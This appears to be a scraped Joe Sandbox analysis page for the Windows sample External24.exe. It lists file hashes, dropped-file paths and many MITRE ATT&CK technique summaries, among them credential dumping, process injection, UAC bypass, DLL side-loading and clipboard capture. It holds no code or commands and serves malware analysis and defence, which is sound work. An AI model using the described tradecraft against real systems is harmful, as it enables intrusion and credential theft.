Opcode ID: 1929e1d21e53742940ac2ceafa89e31e5fc7bd0186b8238dfbd764f6c81308ee
Instruction ID: 5e0bfe89ba54d364be876dccc1ac60975f42015d11e1690ca81266254ffc2184
Opcode Fuzzy Hash: 1929e1d21e53742940ac2ceafa89e31e5fc7bd0186b8238dfbd764f6c81308ee
Instruction Fuzzy Hash: 3ED0C975384711BBF764AB709C0BFEA6A5AAB40B50F05182AB356AA5E1C9E05840C754

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report External24.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Change of critical system settings

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js

C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

C:\Users\user\AppData\Local\PixelFlow Creations\m

C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

C:\Users\user\AppData\Local\Temp\292668\r

C:\Users\user\AppData\Local\Temp\7yC9aM3nOPMh37Qvw5GmIXM.zip

C:\Users\user\AppData\Local\Temp\Accidents

C:\Users\user\AppData\Local\Temp\Annex

C:\Users\user\AppData\Local\Temp\Anytime

C:\Users\user\AppData\Local\Temp\Appearance

Windows Analysis Report
External24.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre